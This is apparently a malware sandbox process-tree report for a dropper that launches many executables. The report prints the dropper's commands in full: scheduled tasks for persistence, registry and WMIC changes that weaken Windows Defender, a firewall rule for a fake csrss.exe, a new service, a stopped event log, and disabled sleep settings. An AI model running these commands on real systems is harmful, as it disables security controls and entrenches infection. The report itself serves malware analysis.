C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanBfHpufHmetoO\y5uaEaUf48i8n9Qniv3S.exe"C:\Users\Admin\AppData\Local\Temp\spanBfHpufHmetoO\y5uaEaUf48i8n9Qniv3S.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account4⤵
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbf4a246f8,0x7ffbf4a24708,0x7ffbf4a247185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,630598251978933554,17630880997586671506,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,630598251978933554,17630880997586671506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,630598251978933554,17630880997586671506,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,630598251978933554,17630880997586671506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,630598251978933554,17630880997586671506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ffbf4a246f8,0x7ffbf4a24708,0x7ffbf4a247185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbf4a246f8,0x7ffbf4a24708,0x7ffbf4a247185⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\SimpleAdobe\RywFynlGmvj9w4ioAVgV8D8E.exeC:\Users\Admin\Documents\SimpleAdobe\RywFynlGmvj9w4ioAVgV8D8E.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
-
C:\Users\Admin\Documents\SimpleAdobe\Up6vep04xzwDn4VAT5SCyTtH.exeC:\Users\Admin\Documents\SimpleAdobe\Up6vep04xzwDn4VAT5SCyTtH.exe2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbf4b7ab58,0x7ffbf4b7ab68,0x7ffbf4b7ab784⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=2216,i,16503002792315387254,11456547964818044141,131072 /prefetch:24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=2216,i,16503002792315387254,11456547964818044141,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1968 --field-trial-handle=2216,i,16503002792315387254,11456547964818044141,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=2216,i,16503002792315387254,11456547964818044141,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3044 --field-trial-handle=2216,i,16503002792315387254,11456547964818044141,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4224 --field-trial-handle=2216,i,16503002792315387254,11456547964818044141,131072 /prefetch:14⤵
-
C:\Users\Admin\Documents\SimpleAdobe\jAsAVdGVn7LASmN0xNIc2NDN.exeC:\Users\Admin\Documents\SimpleAdobe\jAsAVdGVn7LASmN0xNIc2NDN.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\Cp9I62ZZPeqtYCorslqAlQ1c.exeC:\Users\Admin\Documents\SimpleAdobe\Cp9I62ZZPeqtYCorslqAlQ1c.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC5FF.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD532.tmp\Install.exe.\Install.exe /rfpczdidl "525403" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhpuaaonuqVoelUvgo" /SC once /ST 18:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD532.tmp\Install.exe\" cY /KaVdidAnRu 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bhpuaaonuqVoelUvgo"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bhpuaaonuqVoelUvgo6⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bhpuaaonuqVoelUvgo7⤵
-
C:\Users\Admin\Documents\SimpleAdobe\bqS3WhD_TNek648LHXKaBteJ.exeC:\Users\Admin\Documents\SimpleAdobe\bqS3WhD_TNek648LHXKaBteJ.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\heidiYgglaqzemuNI\85QzWOcSfkVjBrK5hRvA.exe"C:\Users\Admin\AppData\Local\Temp\heidiYgglaqzemuNI\85QzWOcSfkVjBrK5hRvA.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\Documents\SimpleAdobe\_IX6sbZYSa2BesN0wAzVXZ2o.exeC:\Users\Admin\Documents\SimpleAdobe\_IX6sbZYSa2BesN0wAzVXZ2o.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
-
C:\Users\Admin\Documents\SimpleAdobe\jnVWtmNX6wOSBntsy6FiTqMO.exeC:\Users\Admin\Documents\SimpleAdobe\jnVWtmNX6wOSBntsy6FiTqMO.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
-
C:\Users\Admin\Documents\SimpleAdobe\jnVWtmNX6wOSBntsy6FiTqMO.exe"C:\Users\Admin\Documents\SimpleAdobe\jnVWtmNX6wOSBntsy6FiTqMO.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5876 -s 2885⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3768 -ip 37681⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4108 -ip 41081⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\svchost.exesvchost.exe4⤵
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSD532.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSD532.tmp\Install.exe cY /KaVdidAnRu 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
